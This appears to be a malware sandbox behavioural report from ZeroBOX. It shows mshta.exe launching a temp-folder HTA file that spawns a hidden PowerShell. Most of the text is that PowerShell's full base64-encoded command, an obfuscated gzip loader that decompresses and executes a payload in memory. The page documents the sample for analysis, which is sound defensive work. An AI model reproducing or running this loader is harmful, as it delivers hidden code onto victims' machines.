| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\logista.hta
1072
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGMARwBwAHUARgBlAHgARABMAEcAcwBEAFkAUQBGAE8AMwBiACsAZAA0AHcAcwBJAHcAOABnAHAAbwBhAHUAZwA2AHUAbABQAC8ANgBxADAAdwB1ADcAKwBzAHYATgBXADYAZgBHAEcANQBjAEsAYQB0AFoAagBKAEYAWABzADEAMgAzAFQAQgBJAC8AeQBQAHgAQQBMAFEAdABSAHAAUwB3ADUAVgBoAFQARQB3AFEAcgBYAHAAbwA3AGYAYgBOAFEAbQBoAGYAZAB5ADQAYgB4ADAAOQByADEATQBYAGkASgBiAGgAdwBiAEUAOABYAG0AUQB1AGQAVwB6AFQAcQBVAE0AdwB4AEYAZwBRADUAOAB4AEwARgBlAEoAWgBYADcAZQA4AHUAVwBGACsAUABiAG0AagBaAEwANAAyAFAARgBRAFQAZgBBAHgAaQBvAEoAUQBSAGQASABCAHMAVgBCAGMANgB4AHUAKwA3AFMASQBGAHIAVQBDAHQASABFAE0ASwAvAFgAVwBaAEIAQwBjAGkAaABKAFAASQBKADYANgArAGcATgA0AGgAMgBLAEgASwByAFoAKwA0AGIAaABYAHMATAB2AC8AVQA3AGsAdABGAFIAdQBrAFYAMwBEADkAVgBxAHIAeABYAEEAcQBrAFIAagBzAGoAcQBoAFIATgAvAEEAbwBkAFUAOABPAFoAcwBEAHMATAA1AHoAZgB0ADMANQBDAEwAaAA3AHoAZQBDAGsAYQBVAGYAcABRACsAbwBhAGkATQBYAHIAUQAyAE0AWABqAEgAZwArADQANgByAHAAWgB1AGIAWgBUAEYARQBFAEUAOQBsAEYATQBSAE8AbwBmAGUAVgBvAEsAcQBFAEIARQA0AFkATwBJAGkAeQBQAEoAMQBhAGwAQwBEAHkANQBXAGQAKwB6AHMAZABlAE4AZQBQAHEAcAA0AGIAcQBWADYAMgBMAHoAagBrADkAWgB6ACsAKwBFAGsAcwA5AGMATwB5AFgAMABnADEAWgB1AHIAQQBuAFgAMwA4ADEARQA4AGUAMQBVAFoAVAB2AGYAMwA0AGIAVwBMAFIAeQBmAE0AUgBtAHYAdQBFADUAMQBwAFgAdwBsAFkAOQB5AGgAbABZAHUASwB2AEMAbwBYAGMAVgBrADgATABOAFMAdgBtAHcAZwBtADcAMgBnAFUAOAA0AEIAWABmADYAdQB4AG4AawBPAGYAdABQAHQAbgBwADIAagBMAGMAaAA3AEQARgA0AEIASgBjAGgAZgBuAFQAbgBuAHMARgBJAFcAZgBBAGwANQBnAE4AOQA1AEQAagBTADkAWABjAEUAMQBRADEAZgBwAHkAOQBYAEsAcgBxAGYAbgA4ADUAegBMAGoARwB2AEUAYwBaAFUAWQBKAFgARABQAHIAUwBxAGgASQBzAE4ARgBkAHAAVwBnAC8AZABpADUAYgBOAEUASgBEAG8AcABoACsAYQBlADcAVQB1AEoAaQB4AHoASgBpAGYARABYADMAUQBuADQAQQA2AGUAVgBvAEoAdgBEAGgAeABpAFEAVwBaAEIAZABnADAATgBRAFEAVwBZADcAaAA1AHEAaABVAGkAYgA1AGoAbwAyADYAbQBPAHUAdQByAEMAKwBVAFAATQBXAEUATQAxADQAVQByAEIANQBZAE8AawBCAE4AWQB5AGIARgBRAGMAYwA2AFoAeQBLADcAKwBPAHoALwBJAG0AbwBxAHcANABJAFUAdQA4AGsAQwA2AHEARQBLADgAYQA2AHkAaAA1AGwAeAB1AFYARQBFADMAWQA0ADMAcwA4AG4AOQB3ACsAMwBwAFAAegBwAGMAaQB4ACsAbwBLADAAagB1AG4AZwBRAEMAcQBHACsAQQBxAG8AVABzAFIAaAByAHAAVwByAHYANQBHAHYAUAAvAE4AdgBWADkATAB6AEMAOQB1AE0AaABHADYASgBMAEoAUwBYAE0AUgBsAE4AOABQADUAZABiAGsAOQB2AEYAcgA1ADgALwBMADEARABjAGsAQwB0AHcAZwBEAFoAbgB3AFUAZQBGADAAagBSAHUAMgBXAFcAaABTAHgAUwByAG4AWgBTAGYAWgBDAEoAbQAzAEgANwBhAGoASABIAGYAagArAHYAcwA5AHAAOABEAHYAQQByADcAbgBuAHUAZQBGAFEAVgBNAEsAdQBNAHIAUwA0ADUASABuAFUAcAA4AFMAVgBNAE8ANgB3AHIAUwBSAE4AaABFAFQAcgBVAGsAMgBlAEEAcgBuAFQAdgBzAGUAdABoAE0ATgB6AE0ASwA4AG4AWABxAHQAdQBoADgASgBCAGgAcgBYADQAYwBkACsAUABXAGUASABBADAAdgAzAEcAUAB1AEQAYgBhACsAZgBwAFkAdQBlAHMAUAB6AGIAVAB1AGoAawBUACsARQBlAHoAeAA3AGYANgBlAHMAegBuADgAbgAzAGgAMABPAFgAMwB6AEYATQBBADQAMwA4AEkAQgB5AFkAUQBRAGEALwBUAEQAdgAxAHUAYQByAGMAUQBKADcAYgBSAGIARwBpAGwAVABkAHgAQgB4AHYAcQBZAEQAZgBRADcAbABhAHIAMwA5AEUAdwBlADYAbAB3AG8AcQA3ADQAOQBOAE8AdABqAFgAcABSAFAARABRADQAZgBLAGIAdQB2AFUARABZAFgATAAyAHgAOQB6AHoAVgBIADUAaQBDAEUATwBJAFgAbQBXAG0AMwA3AFkAcQBhAHEAMwBjAHoAYQBKAGEAYwBSAEkAMgAyAHQAdgBqAHkAMABCAC8AdgBPAGcAMwAxAHEAWgBMAHoAYwBBAGgAeQBPAGEAaQBaAHQANQBtADMANwBhAE0AMwA0ADEASgByAEoAdwA2AHcALwBsADMAdABnAGQANQA5AE0AMQA2ADIAKwBwAEQAYgBCAHQAbQBvAGYAVQAzAHMAUwBQADQAcwBhAG4AagBkAEgAaAB0AGYASwBNAHIALwBGAEMARgB2AGgATwBMAFIAQwByAE0ALwBFAGQAbQBSAGsAVABEAGgAMABrAE4AbABkADQAVgB4AFgASABDADcAVwA0AGgATwBIAHoALwA2AHAAcQBwAEwAWgBZAE4AdgB0AGEAKwB3AEEAYgBQAHUATQBKAEUARQB1AGoAQQBjAGUAVABVAEIAbQBFAEQAdABnAHEAeABQAHQAQgBVAGYAYQBaAHUAMgB0ADEAWgBSAFQAUwBkAFgARgBxAGUATAB5AEIAcgB1AGgAWgBZADYAbQBWAEYAYgB2AGoAdABSAGQAUwA5AFoAMgBvAGMAeABPADMATABIAFEAYgB2AFMAcABRADAATwAvAGEAOQBqAEkAeQByAFIARABhADgAMAA5AGgAKwAwAEcAWQA3AE8AZQA4ADIAQgBpAHEAdABQAHAAbgBuAGEAeQBKAHoAbgA2AGEAbQB4AFEAbgBWAG0ANwBuADkAcgA4AGYAaABEAFAAcgBMADIANgBRAE4ANQBnAHMAdQBMAGQAZQB1AGQAeABKAGoAUgBFAGUAcwB3AHQATgBQADIANABZADMAVgBxAFkAZQByAHAAYwBhAGgAVABEAHkATwBXAEUAcgBVAEoAOQBUAFEAWQBjACsASgBNADMAUgAxAGwAbABzAGYARgBPAHMAUABqAFoAeQAxADkAWQBpAFoAMQBHAGYAegBwAE0AagBvAFYAUwB0AHIANABhAEcAcQA3AHoAbgB5AHkAYQBXAG0AcwBFAG8AeQBZAGMAUwByADIAZQBBAEYAeABLAFcAVQBPAEgAZABjAFoAYwA5ADMAZQBwAEcANAA5AG0ANQBRAG8ASwAvAHkAQwBVAGIAagA1AGcAcQBZAFcATQB1AHMAdgBVAGgAYgArAFgAMgBTAG4ASQBIAHQAVQBkAG4AcAB2AE0AbABrAG8AdgBUAEgAawB1AG0ANQByAHYAWABFAHEAagBiAGwAagBYADEAbgBYAHgAWQBtADcANgBFADMAMABRAEkAYgA1AE0AOAB1ADAAdwB2AG0AdQBTAHkAdQB1AFAARwBPADkAUgBiADcAVwBWADMAZAAxAEQAdgBTADQANgBTAFQAVQAyAEYAVAB1AGcANgAzAFIAMgBMAFYANwBZAEwAYwB4ADQAUgBZAEsANgA0AG0AYwBzAHEAdgBQAFEAQwBiAFIAZQBIAGUAZwBVAFUAOABNADIANQAzAEwAWABDAG8ATgBiAGUAQwBWAFEAaAAwAG4ARQAxAHIARwBkAGkAcgBwAHIARQBMAFAANgBhAGEAdABxAEQAdQA3AHAAKwBtAFcAeABOAE8AVQAxAHEATgBsAFIAVgBkADIASwByAGUAbQBOAEcAYQBkAHgANwAvAHAAMABRADEAdwBsAGQAdABJAFEAMgBlADMANQBaAG8ANgBOAFgAVQBlAGQATwA1AHgAdQB3ADMAbQBqAFoANgBBAE8ANQBsAHkAawBPAEsAdwAyADAAaABYAGUAMgBYAG0ASwBmADQAbwBmAEQAdwBjAEQAdgB6AHoASwBhAHcANwAyAFgAUQB4AGEAdQA0AGIASwAwAFkANwA4AGIAUQBwAFAAUABVADgAOQB4AGkAdgA5ADAAbABqADQAOABoAEQANgBzAEgAbwAyAHMAQgBUAGQAUwBvAFAAaABSAFAAdwBtAFkAcQAzAFEAawBQAGEAMgBoAHgAKwAzAEQAVABaAEgAdgBBAHcAOQBZAEkAMABCAGgANAA1AGQANwA2AFkANwBtAFAAZwBhAFMAYQB4AFEAaQBiAG4AWABEADEAaQBJACsAbwBXAFgASwAyAHYAMwBEADAAegBkAGwAbwBEAGMANgB2AEgAaQA4AGUAVwBsAEEAeQBhACsARwBSAE4AcQBLAE0AMABxAFEATwBXAE8AMQBGAFIATwBUAHkAQQB1AGMANwBxAC8ARgBRADQAKwBrAC8AcQBnAC8AQQAxAHIAMABtAHIASQBJAEkAdQA0ADMAVABLAG4AKwA1AC8ARQB2AG4AZwAzAHMAWABFAHAAZQA1AEEAdABZAEUAeQBWAGkAegBmADMAWgBIADUAOAAzAC8AWgBXAE0ATABLAFMAOQBHAHQAdgBaAHYAZQBtADAAYwB3ADEAbgB6AEkAQwAxAGgAUgA0AGcANwBHAHUAOABMADEAVwBRAGMAawBHAFYARwA4AE0AVgB3AG8AYQBOAEQARgBYAE4AOABnAFAAbwBqADQAUwB5ADgAeQBDAHAAeABjAG8AMQBMADUAdQBIADMAZQBvAGMAaABIAEwAcgBTAFcAMABIAHgAZQBLAHoAZgB0AHUAbwBHAFYAZAAwACsAZgB0AEQASABRAHkANQAwADcAcgBCAGQANABvAFMAWQB3AGIARABZACsASABKAEgARQBtAHkAQwAwAFQATwBlAFkAegBHAFMAMQBLAGoAcQBNAFMANABUAFgAUgB1AHMAcQArAE8AWABMAEEAcwBLAHIAdgBpAEUANABSAFAANABhAGIANgBvAEUAZABXAHgAUwBGAEoAWAAvAGIAMQBGAGsANgBjADkAQgBZAFkASQB3AHEAMQB5AE0AVgBmAFAAdQA2AHAAMABYAFAAMAA5AHgAaQAxAFAASQBDACsANQBSADQAbgB2AG8ALwB3AGoAOQBMADAAZgArAGQAMQBCAHoAMgBJAHIAMgA3AEEAMgAwAHcAcQBHAFAAawBTAEoATAA1AFcAKwBsAGsAcgBBAGkAMwBxADMASAB6AGcAawArAFAAdABDAGUANgBCAFMAYwBpADQASABuACsASAA0AGIAbQBQAEMAbABVAGoAeQA5AGwAVgB1AEQASgBBAFIAdQBSAHQAdwBhAHgAQQAvAGkASABzAEsAagA0ADIAWQBEAFAAbABlAGkAZABaAEsALwB3ADgAVABQAEwANwBEAHYAUgBHAG8ANABaACsAWAB2AGgASQBJAHMAQgBCADMAMAB2AFIAaQBZAHcARgBFAEUATABWAFYAdQB2AGoAQgAwAFYAWQBEADEAZgB3AEgALwBwAFUAVwBpADIAZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA
  2084

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents